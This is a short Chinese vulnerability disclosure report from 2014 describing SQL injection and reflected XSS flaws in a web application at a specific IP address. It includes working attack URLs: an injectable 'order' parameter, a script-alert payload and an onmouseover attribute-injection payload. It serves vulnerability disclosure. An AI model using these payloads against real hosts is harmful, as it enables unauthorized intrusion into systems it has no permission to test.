漏洞详情

披露状态:

2014-09-27: 细节已通知厂商并且等待厂商处理中
2014-09-29: 厂商已经确认,细节仅向厂商公开
2014-10-09: 细节向核心白帽子及相关领域专家公开
2014-10-19: 细节向普通白帽子公开
2014-10-29: 细节向实习白帽子公开
2014-11-11: 细节向公众公开

简要描述:

注入&XSS

详细说明:

1.注入
http://219.141.157.7/index.php/?a=get_all_phonenum&g=wap&itemid=10&keyword=0&m=item&order=price%20ASC&p=1&price=6&rule_id=1

001.jpg


002.jpg


004.jpg


2.XSS
http://219.141.157.7/?a=get_all_phonenum&g=wap&itemid=10&keyword=0&m=item&order=price%2520ASC%27%22%28%29%26%25%3CScRiPt%20%3Ealert%28%27xss%27%29%3C/ScRiPt%3E&p=1&price=6&rule_id=9
http://219.141.157.7/index.php?a=order_list&delivery_idcard=e%22%20onmouseover%3dprompt%281%29%20bad%3d%22&m=order&order=e

XSS1.jpg


XSS2.jpg


漏洞证明:

见详细说明

修复方案:

过滤

标签: none

评论已关闭